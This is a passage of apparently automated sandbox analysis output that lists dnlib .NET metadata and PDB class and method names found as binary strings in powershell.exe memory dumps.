                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
